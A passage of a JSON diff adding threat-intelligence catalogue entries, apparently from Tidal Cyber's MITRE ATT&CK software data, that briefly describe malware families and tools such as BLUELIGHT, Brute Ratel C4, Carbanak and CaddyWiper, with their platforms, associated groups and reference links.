"0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "066b057c-944e-4cfc-b654-e3dfba04b926", + "type": "similar" + } + ], + "uuid": "72658763-8077-451e-8572-38858f8cacf3", + "value": "BloodHound" + }, + { + "description": "[BLUELIGHT](https://app.tidalcyber.com/software/3aaaaf86-638b-4a65-be18-c6e6dcdcdb97) is a remote access Trojan used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) that was first observed in early 2021.[[Volexity InkySquid BLUELIGHT August 2021](https://app.tidalcyber.com/references/7e394434-364f-4e50-9a96-3e75dacc9866)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0657", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "8bd47506-29ae-44ea-a5c1-c57e8a1ab6b0", + "type": "similar" + } + ], + "uuid": "3aaaaf86-638b-4a65-be18-c6e6dcdcdb97", + "value": "BLUELIGHT" + }, + { + "description": "[Bonadan](https://app.tidalcyber.com/software/3793db4b-f843-4cfd-89d2-ec28b62feda5) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://app.tidalcyber.com/software/3793db4b-f843-4cfd-89d2-ec28b62feda5) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.[[ESET ForSSHe December 2018](https://app.tidalcyber.com/references/0e25bf8b-3c9e-4661-a9fd-79b2ad3b8dd2)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0486", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "type": "similar" + } + ], + "uuid": "3793db4b-f843-4cfd-89d2-ec28b62feda5", + "value": "Bonadan" + }, + { + "description": "[BONDUPDATER](https://app.tidalcyber.com/software/d8690218-5272-47d8-8189-35d3b518e66f) is a PowerShell backdoor used by [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.[[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)][[Palo Alto OilRig Sep 2018](https://app.tidalcyber.com/references/2ec6eabe-92e2-454c-ba7b-b27fec5b428d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0360", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "d5268dfb-ae2b-4e0e-ac07-02a460613d8a", + "type": "similar" + } + ], + "uuid": "d8690218-5272-47d8-8189-35d3b518e66f", + "value": "BONDUPDATER" + }, + { + "description": "[BoomBox](https://app.tidalcyber.com/software/9d393f6f-855e-4348-8a26-008174e3605a) is a downloader responsible for executing next stage components that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2021.[[MSTIC Nobelium Toolset May 2021](https://app.tidalcyber.com/references/52464e69-ff9e-4101-9596-dd0c6404bf76)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0635", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "c26f1c05-b861-4970-94dc-2f7f921a3074", + "type": "similar" + } + ], + "uuid": "9d393f6f-855e-4348-8a26-008174e3605a", + "value": "BoomBox" + }, + { + "description": "[BOOSTWRITE](https://app.tidalcyber.com/software/74a73624-d53b-4c84-a14b-8ae964fd577c) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff).[[FireEye FIN7 Oct 2019](https://app.tidalcyber.com/references/df8886d1-fbd7-4c24-8ab1-6261923dee96)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0415", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "56d10a7f-bb42-4267-9b4c-63abb9c06010", + "type": "similar" + } + ], + "uuid": "74a73624-d53b-4c84-a14b-8ae964fd577c", + "value": "BOOSTWRITE" + }, + { + "description": "[BOOTRASH](https://app.tidalcyber.com/software/d47a4753-80f5-494e-aad7-d033aaff0d6d) is a [Bootkit](https://app.tidalcyber.com/technique/032985de-5e09-4889-b8c4-84d940c6346c) that targets Windows operating systems. It has been used by threat actors that target the financial sector.[[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)][[FireEye Bootkits](https://app.tidalcyber.com/references/585827a8-1f03-439d-b66e-ad5290117c1b)][[FireEye BOOTRASH SANS](https://app.tidalcyber.com/references/835c9e5d-b291-43d9-9b8a-2978aa8c8cd3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0114", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "da2ef4a9-7cbe-400a-a379-e2f230f28db3", + "type": "similar" + } + ], + "uuid": "d47a4753-80f5-494e-aad7-d033aaff0d6d", + "value": "BOOTRASH" + }, + { + "description": "[BoxCaon](https://app.tidalcyber.com/software/d3e46011-3433-426c-83b3-61c2576d5f71) is a Windows backdoor that was used by [IndigoZebra](https://app.tidalcyber.com/groups/988f5312-834e-48ea-93b7-e6e01ee0938d) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://app.tidalcyber.com/software/d3e46011-3433-426c-83b3-61c2576d5f71)'s name stems from similarities shared with the malware family [xCaon](https://app.tidalcyber.com/software/11a0dff4-1dc8-4553-8a38-90a07b01bfcd).[[Checkpoint IndigoZebra July 2021](https://app.tidalcyber.com/references/cf4a8c8c-eab1-421f-b313-344aed03b42d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0651", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "988f5312-834e-48ea-93b7-e6e01ee0938d", + "type": "used-by" + }, + { + "dest-uuid": "919a056e-5104-43b9-ad55-2ac929108b71", + "type": "similar" + } + ], + "uuid": "d3e46011-3433-426c-83b3-61c2576d5f71", + "value": "BoxCaon" + }, + { + "description": "[Brave Prince](https://app.tidalcyber.com/software/51b27e2c-c737-4006-a657-195ea1a1f4f0) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263), and was seen along with [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) and [RunningRAT](https://app.tidalcyber.com/software/e8afda1f-fa83-4fc3-b6fb-7d5daca7173f) in operations surrounding the 2018 Pyeongchang Winter Olympics. [[McAfee Gold Dragon](https://app.tidalcyber.com/references/4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0252", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "28b97733-ef07-4414-aaa5-df50b2d30cc5", + "type": "similar" + } + ], + "uuid": "51b27e2c-c737-4006-a657-195ea1a1f4f0", + "value": "Brave Prince" + }, + { + "description": "[Briba](https://app.tidalcyber.com/software/7942783c-73a7-413c-94d1-8981029a1c51) is a trojan used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) to open a backdoor and download files on to compromised hosts. [[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)] [[Symantec Briba May 2012](https://app.tidalcyber.com/references/bcf0f82b-1b26-4c0c-905e-0dd8b88d0903)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0204", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "51146bb6-7478-44a3-8f08-19adcdceffca", + "type": "used-by" + }, + { + "dest-uuid": "79499993-a8d6-45eb-b343-bf58dea5bdde", + "type": "similar" + } + ], + "uuid": "7942783c-73a7-413c-94d1-8981029a1c51", + "value": "Briba" + }, + { + "description": "[[Palo Alto Brute Ratel July 2022](https://app.tidalcyber.com/references/a9ab0444-386b-5baf-84e1-0e6df4a21296)]", + "meta": { + "id": "dba68385-7251-5f62-a90d-391e1e47ee70" + }, + "related": [ + { + "dest-uuid": "23043b44-69a6-5cdf-8f60-5a68068680c7", + "type": "similar" + } + ], + "uuid": "afc6d47c-4375-47c6-bc69-ae0faf2df0bd", + "value": "BRc4" + }, + { + "description": "[Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) was leaked in the cybercriminal underground, leading to its use by threat actors.[[Dark Vortex Brute Ratel C4](https://app.tidalcyber.com/references/47992cb5-df11-56c2-b266-6f58d75f8315)][[Palo Alto Brute Ratel July 2022](https://app.tidalcyber.com/references/a9ab0444-386b-5baf-84e1-0e6df4a21296)][[MDSec Brute Ratel August 2022](https://app.tidalcyber.com/references/dfd12595-0056-5b4a-b753-624fac1bb3a6)][[SANS Brute Ratel October 2022](https://app.tidalcyber.com/references/9544e762-6f72-59e7-8384-5bbef13bfe96)][[Trend Micro Black Basta October 2022](https://app.tidalcyber.com/references/6e4a1565-4a30-5a6b-961c-226a6f1967ae)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1063", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + }, + { + "dest-uuid": "75d8b521-6b6a-42ff-8af3-d97e20ce12a5", + "type": "similar" + }, + { + "dest-uuid": "afc6d47c-4375-47c6-bc69-ae0faf2df0bd", + "type": "similar" + } + ], + "uuid": "23043b44-69a6-5cdf-8f60-5a68068680c7", + "value": "Brute Ratel C4" + }, + { + "description": "[BS2005](https://app.tidalcyber.com/software/c9e773de-0213-4b64-83fb-637060c8b5ed) is malware that was used by [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) in spearphishing campaigns since at least 2011. [[Mandiant Operation Ke3chang November 2014](https://app.tidalcyber.com/references/bb45cf96-ceae-4f46-a0f5-08cd89f699c9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0014", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "67fc172a-36fa-4a35-88eb-4ba730ed52a6", + "type": "similar" + } + ], + "uuid": "c9e773de-0213-4b64-83fb-637060c8b5ed", + "value": "BS2005" + }, + { + "description": "", + "meta": { + "id": "bc902752-8e2e-4037-9147-b3c6ff297539" + }, + "related": [ + { + "dest-uuid": "2be4e3d2-e8c5-4406-8041-2c17bdb3a547", + "type": "similar" + } + ], + "uuid": "ad8fc8bb-3562-4a56-b132-be625b1dc208", + "value": "Backdoor.APT.FakeWinHTTPHelper" + }, + { + "description": "[BUBBLEWRAP](https://app.tidalcyber.com/software/2be4e3d2-e8c5-4406-8041-2c17bdb3a547) is a full-featured, second-stage backdoor used by the [admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. [[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0043", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8567136b-f84a-45ed-8cce-46324c7da60e", + "type": "used-by" + }, + { + "dest-uuid": "123bd7b3-675c-4b1a-8482-c55782b20e2b", + "type": "similar" + }, + { + "dest-uuid": "ad8fc8bb-3562-4a56-b132-be625b1dc208", + "type": "similar" + } + ], + "uuid": "2be4e3d2-e8c5-4406-8041-2c17bdb3a547", + "value": "BUBBLEWRAP" + }, + { + "description": "[build_downer](https://app.tidalcyber.com/software/c21d3e6c-0f6d-44a8-bdd5-5b3180a641c9) is a downloader that has been used by [BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) since at least 2019.[[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0471", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "d2c7f8ad-3b50-4cfa-bbb1-799eff06fb40", + "type": "similar" + } + ], + "uuid": "c21d3e6c-0f6d-44a8-bdd5-5b3180a641c9", + "value": "build_downer" + }, + { + "description": "[Bumblebee](https://app.tidalcyber.com/software/cc155181-fb34-4aaf-b083-b7b57b140b7a) is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. [Bumblebee](https://app.tidalcyber.com/software/cc155181-fb34-4aaf-b083-b7b57b140b7a) has been linked to ransomware operations including [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5), Quantum, and Mountlocker and derived its name from the appearance of \"bumblebee\" in the user-agent.[[Google EXOTIC LILY March 2022](https://app.tidalcyber.com/references/19d2cb48-bdb2-41fe-ba24-0769d7bd4d94)][[Proofpoint Bumblebee April 2022](https://app.tidalcyber.com/references/765b0ce9-7305-4b35-b5be-2f6f42339646)][[Symantec Bumblebee June 2022](https://app.tidalcyber.com/references/81bfabad-b5b3-4e45-ac1d-1e2e829fca33)]\n", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1039", + "source": "MITRE", + "tags": [ + "aa983c81-e54b-49b3-b0dd-53cf950825b8", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "396a4361-3e84-47bc-9544-58e287c05799", + "type": "used-by" + }, + { + "dest-uuid": "04378e79-4387-468a-a8f7-f974b8254e44", + "type": "similar" + } + ], + "uuid": "cc155181-fb34-4aaf-b083-b7b57b140b7a", + "value": "Bumblebee" + }, + { + "description": "[[MacKeeper Bundlore Apr 2019](https://app.tidalcyber.com/references/4d631c9a-4fd5-43a4-8b78-4219bd371e87)]", + "meta": { + "id": "2c496adc-9061-4675-83a6-e53a8a5e6088" + }, + "related": [ + { + "dest-uuid": "e9873bf1-9619-4c62-b4cf-1009e83de186", + "type": "similar" + } + ], + "uuid": "2fc667d6-96ca-4414-95d7-3ce49383508a", + "value": "OSX.Bundlore" + }, + { + "description": "[Bundlore](https://app.tidalcyber.com/software/e9873bf1-9619-4c62-b4cf-1009e83de186) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://app.tidalcyber.com/software/e9873bf1-9619-4c62-b4cf-1009e83de186) has many features associated with more traditional backdoors.[[MacKeeper Bundlore Apr 2019](https://app.tidalcyber.com/references/4d631c9a-4fd5-43a4-8b78-4219bd371e87)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0482", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7bef1b56-4870-4e74-b32a-7dd88c390c44", + "type": "similar" + }, + { + "dest-uuid": "2fc667d6-96ca-4414-95d7-3ce49383508a", + "type": "similar" + } + ], + "uuid": "e9873bf1-9619-4c62-b4cf-1009e83de186", + "value": "Bundlore" + }, + { + "description": "[Cachedump](https://app.tidalcyber.com/software/7c03fb92-3cd8-4ce4-a1e0-75e47465e4bc) is a publicly-available tool that program extracts cached password hashes from a system’s registry. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0119", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "c9cd7ec9-40b7-49db-80be-1399eddd9c52", + "type": "similar" + } + ], + "uuid": "7c03fb92-3cd8-4ce4-a1e0-75e47465e4bc", + "value": "Cachedump" + }, + { + "description": "[CaddyWiper](https://app.tidalcyber.com/software/62d0ddcd-790d-4d2d-9d94-276f54b40cf0) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.[[ESET CaddyWiper March 2022](https://app.tidalcyber.com/references/9fa97444-311f-40c1-8728-c5f91634c750)][[Cisco CaddyWiper March 2022](https://app.tidalcyber.com/references/88fc1f96-2d55-4c92-a929-234248490c30)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0693", + "source": "MITRE", + "tags": [ + "2e621fc5-dea4-4cb9-987e-305845986cd3" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b30d999d-64e0-4e35-9856-884e4b83d611", + "type": "similar" + } + ], + "uuid": "62d0ddcd-790d-4d2d-9d94-276f54b40cf0", + "value": "CaddyWiper" + }, + { + "description": "[Cadelspy](https://app.tidalcyber.com/software/c8a51b39-6906-4381-9bb4-4e9e612aa085) is a backdoor that has been used by [APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1).[[Symantec Chafer Dec 2015](https://app.tidalcyber.com/references/0a6166a3-5649-4117-97f4-7b8b5b559929)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0454", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "a705b085-1eae-455e-8f4d-842483d814eb", + "type": "similar" + } + ], + "uuid": "c8a51b39-6906-4381-9bb4-4e9e612aa085", + "value": "Cadelspy" + }, + { + "description": "[CALENDAR](https://app.tidalcyber.com/software/ad859a79-c183-44f6-a89a-f734710672a9) is malware used by [APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) that mimics legitimate Gmail Calendar traffic. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0025", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "5a84dc36-df0d-4053-9b7c-f0c388a57283", + "type": "similar" + } + ], + "uuid": "ad859a79-c183-44f6-a89a-f734710672a9", + "value": "CALENDAR" + }, + { + "description": "[Calisto](https://app.tidalcyber.com/software/6b5b408c-4f9d-4137-bfb1-830d12e9736c) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://app.tidalcyber.com/software/6b5b408c-4f9d-4137-bfb1-830d12e9736c) is believed to have first been developed in 2016. [[Securelist Calisto July 2018](https://app.tidalcyber.com/references/a292d77b-9150-46ea-b217-f51e091fdb57)] [[Symantec Calisto July 2018](https://app.tidalcyber.com/references/cefef3d8-94f5-4d94-9689-6ed38702454f)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0274", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b8fdef82-d2cf-4948-8949-6466357b1be1", + "type": "similar" + } + ], + "uuid": "6b5b408c-4f9d-4137-bfb1-830d12e9736c", + "value": "Calisto" + }, + { + "description": "[CallMe](https://app.tidalcyber.com/software/352ee271-89e6-4d3f-9c26-98dbab0e2986) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. [[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0077", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6c1bdc51-f633-4512-8b20-04a11c2d97f4", + "type": "used-by" + }, + { + "dest-uuid": "cb7bcf6f-085f-41db-81ee-4b68481661b5", + "type": "similar" + } + ], + "uuid": "352ee271-89e6-4d3f-9c26-98dbab0e2986", + "value": "CallMe" + }, + { + "description": "[Cannon](https://app.tidalcyber.com/software/790e931d-2571-496d-9f48-322774a7d482) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. [[Unit42 Cannon Nov 2018](https://app.tidalcyber.com/references/8c634bbc-4878-4b27-aa18-5996ec968809)][[Unit42 Sofacy Dec 2018](https://app.tidalcyber.com/references/540c4c33-d4c2-4324-94cd-f57646666e32)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0351", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "d20b397a-ea47-48a9-b503-2e2a3551e11d", + "type": "similar" + } + ], + "uuid": "790e931d-2571-496d-9f48-322774a7d482", + "value": "Cannon" + }, + { + "description": "[[Fox-It Anunak Feb 2015](https://app.tidalcyber.com/references/d74a8d0b-887a-40b9-bd43-366764157990)] [[FireEye CARBANAK June 2017](https://app.tidalcyber.com/references/39105492-6044-460c-9dc9-3d4473ee862e)]", + "meta": { + "id": "be99b5bb-731e-4040-9912-985c893fab6b" + }, + "related": [ + { + "dest-uuid": "4cb9294b-9e4c-41b9-b640-46213a01952d", + "type": "similar" + } + ], + "uuid": "b0ac8d42-1536-4b96-b0d5-8052308d2177", + "value": "Anunak" + }, + { + "description": "[Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. [[Kaspersky Carbanak](https://app.tidalcyber.com/references/2f7e77db-fe39-4004-9945-3c8943708494)] [[FireEye CARBANAK June 2017](https://app.tidalcyber.com/references/39105492-6044-460c-9dc9-3d4473ee862e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0030", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "72d9bea7-9ca1-43e6-8702-2fb7fb1355de", + "type": "used-by" + }, + { + "dest-uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4", + "type": "similar" + }, + { + "dest-uuid": "b0ac8d42-1536-4b96-b0d5-8052308d2177", + "type": "similar" + } + ], + "uuid": "4cb9294b-9e4c-41b9-b640-46213a01952d", + "value": "Carbanak" + }, + { + "description": "[Carberp](https://app.tidalcyber.com/software/df9491fd-5e24-4548-8e21-1268dce59d1f) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://app.tidalcyber.com/software/df9491fd-5e24-4548-8e21-1268dce59d1f)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) backdoor.[[Trend Micro Carberp February 2014](https://app.tidalcyber.com/references/069e458f-d780-47f9-8ebe-21b195fe9b33)][[KasperskyCarbanak](https://app.tidalcyber.com/references/053a2bbb-5509-4aba-bbd7-ccc3d8074291)][[RSA Carbanak November 2017](https://app.tidalcyber.com/references/eb947d49-26f4-4104-8296-1552a273c9c3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0484", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "bbcd7a02-ef24-4171-ac94-a93540173b94", + "type": "similar" + } + ], + "uuid": "df9491fd-5e24-4548-8e21-1268dce59d1f", + "value": "Carberp" + }, + { + "description": "[Carbon](https://app.tidalcyber.com/software/61f5d19c-1da2-43d1-ab20-51eacbca71f2) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://app.tidalcyber.com/software/61f5d19c-1da2-43d1-ab20-51eacbca71f2) has been selectively used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target government and foreign affairs-related organizations in Central Asia.[[ESET Carbon Mar 2017](https://app.tidalcyber.com/references/5d2a3a81-e7b7-430d-b748-b773f89d3c77)][[Securelist Turla Oct 2018](https://app.tidalcyber.com/references/5b08ea46-e25d-4df9-9b91-f8e7a1d5f7ee)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0335", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "b7e9880a-7a7c-4162-bddb-e28e8ef2bf1f", + "type": "similar" + } + ], + "uuid": "61f5d19c-1da2-43d1-ab20-51eacbca71f2", + "value": "Carbon" + }, + { + "description": "[Cardinal RAT](https://app.tidalcyber.com/software/fa23acef-3034-43ee-9610-4fc322f0d80b) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://app.tidalcyber.com/software/fa23acef-3034-43ee-9610-4fc322f0d80b) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.[[PaloAlto CardinalRat Apr 2017](https://app.tidalcyber.com/references/8d978b94-75c9-46a1-812a-bafe3396eda9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0348", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "b879758f-bbc4-4cab-b5ba-177ac9b009b4", + "type": "similar" + } + ], + "uuid": "fa23acef-3034-43ee-9610-4fc322f0d80b", + "value": "Cardinal RAT" + }, + { + "description": "[CARROTBALL](https://app.tidalcyber.com/software/84bb4068-b441-435e-8535-02a458ffd50b) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://app.tidalcyber.com/software/84bb4068-b441-435e-8535-02a458ffd50b) has been used as a downloader to install [SYSCON](https://app.tidalcyber.com/software/ea556a8d-4959-423f-a2dd-622d0497d484).[[Unit 42 CARROTBAT January 2020](https://app.tidalcyber.com/references/b65442ca-18ca-42e0-8be0-7c2b66c26d02)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0465", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5fc81b43-62b5-41b1-9113-c79ae5f030c4", + "type": "similar" + } + ], + "uuid": "84bb4068-b441-435e-8535-02a458ffd50b", + "value": "CARROTBALL" + }, + { + "description": "[CARROTBAT](https://app.tidalcyber.com/software/aefa893d-fc6e-41a9-8794-2700049db9e5) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://app.tidalcyber.com/software/aefa893d-fc6e-41a9-8794-2700049db9e5) has been used to install [SYSCON](https://app.tidalcyber.com/software/ea556a8d-4959-423f-a2dd-622d0497d484) and has infrastructure overlap with [KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889).[[Unit 42 CARROTBAT November 2018](https://app.tidalcyber.com/references/6986a64a-5fe6-4697-b70b-79cccaf3d730)][[Unit 42 CARROTBAT January 2020](https://app.tidalcyber.com/references/b65442ca-18ca-42e0-8be0-7c2b66c26d02)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0462", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "1b9f0800-035e-4ed1-9648-b18294cc5bc8", + "type": "similar" + } + ], + "uuid": "aefa893d-fc6e-41a9-8794-2700049db9e5", + "value": "CARROTBAT" + }, + { + "description": "[Catchamas](https://app.tidalcyber.com/software/04deccb5-9850-45c3-a900-5d7039a94190) is a Windows Trojan that steals information from compromised systems. [[Symantec Catchamas April 2018](https://app.tidalcyber.com/references/155cc2df-adf4-4b5f-a377-272947e5757e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0261", + "source": "MITRE", + "tags": [], + "type": "malware" 